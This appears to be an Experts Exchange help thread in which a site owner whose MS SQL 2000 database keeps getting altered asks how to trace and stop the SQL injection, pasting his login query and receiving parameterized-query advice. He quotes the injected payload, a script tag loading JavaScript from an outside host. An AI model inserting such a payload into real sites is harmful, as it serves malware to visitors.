Aleks
asked on
SQL Injection
I am having a problem with my database: somehow someone is altering the data in my database. I talked to the IT staff and they say it might be an SQL injection. It alters all the records in one table, adding some junk code, like:
so if the value before was 'aleks', after the injection it is 'aleks<script src=http://www.bnrupdate.mobi/b.js></script>'
Have you seen this before? Sometimes it's code from Google Analytics, etc. It is driving me crazy, not to mention a security risk. How can I track down when and who is doing this, and how can I prevent this from happening again?
This is a web application with limited users; everything (web forms, etc.) is behind a username/password protected area. Nothing is open to the public. I am using MS SQL 2000.
Any pointers are appreciated, this is a big concern for me at this moment. And I am willing to pretty much try everything that could help. But if there is a way to get the person doing this, I am willing to set up a 'trap' to get his IP or whatever.
Aleks
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
So, for them to do this, do they need to type ' (quotes) in the password field?
If I don't allow such a character in ANY field in my entire system, would this prevent future injections?
ASKER
What do you mean 'escape' ?
ASKER
Ok, let me get this straight.
1. I am being attacked by someone entering code in the fields where for example username or password should be?
2. If I don't allow the apostrophe, or replace it, in either field, they should no longer be able to enter the code to attack me. Correct?
ASKER
This is the query for my login page, which is the only form outside of the password protected area.
<%
// Username from the login form; stays "%" when the field is missing or empty
var EmployeeLogin__usxusername = "%";
if (String(Request.Form("txtusername")) != "undefined" &&
    String(Request.Form("txtusername")) != "") {
  EmployeeLogin__usxusername = String(Request.Form("txtusername"));
}
%>
<%
// Password from the login form; same default handling
var EmployeeLogin__usxpassword = "%";
if (String(Request.Form("txtpassword")) != "undefined" &&
    String(Request.Form("txtpassword")) != "") {
  EmployeeLogin__usxpassword = String(Request.Form("txtpassword"));
}
%>
<%
var EmployeeLogin = Server.CreateObject("ADODB.Recordset");
EmployeeLogin.ActiveConnection = MM_AAA_STRING;
// The query is built by string concatenation; single quotes in the input are doubled
EmployeeLogin.Source = "select * from dbo.vulogdtls WHERE Loginid = '"+ EmployeeLogin__usxusername.replace(/'/g, "''") + "' AND Password = '"+ EmployeeLogin__usxpassword.replace(/'/g, "''") + "' AND Enable = 1 AND (ExpDate >= getdate() OR ExpDate IS NULL)";
EmployeeLogin.CursorType = 0;
EmployeeLogin.CursorLocation = 2;
EmployeeLogin.LockType = 1;
EmployeeLogin.Open();
var EmployeeLogin_numRows = 0;
%>
Would that query have any problem and be potentially unsafe? Or is it OK?
I can't seem to find anything that is causing data to be input into my database; this is really becoming a very stressful experience.
Are there any specific recommendations that anyone can make? I know reading articles helps but won't be something that will immediately and possibly stop the attacks. For example: Change your IP would be a good recommendation.
I heard that from someone, do you think this would help?
Are there other specific recommendations you could offer to help prevent attacks?
How about if it's not from the outside but a file or script already in the server, is this a possibility? Or content in the database that resides there and adds the data ... is this another possibility?
A
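The login lookup from the post above, rewritten with ADO command parameters so that form input is bound as data instead of being concatenated into the SQL string. This is an added example, not code from the original thread; the 50-character limit (`MAX_LEN`) and the `loginOk` variable are assumptions.

```asp
<%
// Added example, not code from the thread. MM_AAA_STRING, dbo.vulogdtls and
// the form field names come from the post above; MAX_LEN (50) is an assumed
// column width and loginOk is a hypothetical variable name.
var adCmdText = 1, adVarChar = 200, adParamInput = 1;  // ADO constants
var MAX_LEN = 50;

function formValue(name) {
  // A missing field stringifies to "undefined", as the original code checks
  var v = String(Request.Form(name));
  return (v == "undefined") ? "" : v;
}

var usxusername = formValue("txtusername");
var usxpassword = formValue("txtpassword");
var loginOk = false;

// Reject empty or over-long input before touching the database, so a value
// never exceeds the declared parameter size.
if (usxusername != "" && usxpassword != "" &&
    usxusername.length <= MAX_LEN && usxpassword.length <= MAX_LEN) {
  var cmd = Server.CreateObject("ADODB.Command");
  cmd.ActiveConnection = MM_AAA_STRING;
  cmd.CommandType = adCmdText;
  // The "?" markers are bound in order. The SQL text is constant, so form
  // input is only ever compared as a value and never parsed as SQL.
  cmd.CommandText =
    "SELECT Loginid FROM dbo.vulogdtls " +
    "WHERE Loginid = ? AND Password = ? AND Enable = 1 " +
    "AND (ExpDate >= getdate() OR ExpDate IS NULL)";
  cmd.Parameters.Append(
    cmd.CreateParameter("@loginid", adVarChar, adParamInput, MAX_LEN, usxusername));
  cmd.Parameters.Append(
    cmd.CreateParameter("@password", adVarChar, adParamInput, MAX_LEN, usxpassword));

  var EmployeeLogin = cmd.Execute();  // forward-only, read-only recordset
  loginOk = !EmployeeLogin.EOF;       // a row came back: credentials matched
  EmployeeLogin.Close();
}
%>
```

Parameters protect only the query they are used in; every other page that builds SQL from request data needs the same change.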
ASKER
Also, is there a possibility this is not an SQL injection and instead some malicious script already residing in the server? If this is the case, what would be the best course of action?
Or is there a chance the script is inside the database?
ASKER
Thank you, this is very useful. I will look into these tools.
Aleks
ASKER
I am sorry it's taken long for me to respond, but I have been busy learning and implementing the SQL fixes.
The thing is, last night I stopped my website from IIS. No web access. I cleaned up my database squeaky clean ... midnight ... went to sleep. Woke up and checked my database ... all injected, same code all over different tables (same tables) and mostly on 'text' fields.
So ... how could someone inject information into my database while the website is down? My understanding is that they do it through the web pages by entering code and submitting the form to run it. If there is no form, how in the world did my database get this code?
I checked for viruses and adware/malware ... nothing in the server. It is SQL 2000 with Service Pack 4 and all patched up to the neck ... don't know what else to do.
My DB person told me to run Profiler on the SQL server so we can see what happens overnight. Any other ideas? It would sound like a worm that is in the database, but then again I know nothing about these things. I am losing my faith and my whole business depends on this database :(
ASKER
BTW. I already changed all server passwords, database passwords, ODBC passwords, I assigned a new IP, a new domain name ... and still got the code inserted into my database, all while the website that connects to the database was down.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
>>better still would be to use parameterized queries <<
Very good advice. :)
ASKER
Any other character that would be a big no no ?